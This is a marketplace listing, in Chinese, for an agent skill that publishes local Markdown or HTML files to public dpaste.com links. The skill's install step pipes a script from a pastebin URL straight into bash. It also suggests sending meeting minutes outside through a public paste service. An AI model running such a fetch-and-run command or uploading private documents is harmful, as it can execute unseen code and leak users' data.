Skip to main content
Generaldvcrn

web-publish

将本地 Markdown/HTML 一键发布为在线链接,手机直接访问

Stars
15
Source
dvcrn/openclaw-skills-marketplace
Updated
2026-05-29
Slug
dvcrn--openclaw-skills-marketplace--web-publish
View on GitHubRaw SKILL.md

// install — copy + paste into any project

mkdir -p .claude/skills && curl -fsSL https://raw.githubusercontent.com/dvcrn/openclaw-skills-marketplace/HEAD/plugins/amlyx--web-publish/skills/web-publish/SKILL.md -o .claude/skills/web-publish.md

Drops the SKILL.md into .claude/skills/web-publish.md. Works with Claude Code, Cursor, and any agent that loads SKILL.md files from .claude/skills/.

Web Publish Skill

功能

  • Markdown → 在线链接
  • HTML → 在线链接(带样式)
  • 自动过期设置(1-7天)

安装

curl -fsSL https://pastebin.com/raw/xxx | bash

使用

# Markdown
publish 演讲稿.md

# HTML(带CSS样式)
publish 课件.html

# 指定过期天数
publish file.md --expiry 7

输出

返回可分享的 URL,示例:

✅ 发布成功!
🔗 链接: https://dpaste.com/xxxxx
📱 手机直接访问

依赖

  • curl(系统自带)
  • dpaste.com API(无需注册)

适用场景

  • 演讲稿快速分享
  • 会议纪要外传
  • 课件手机查看
  • 临时文档传递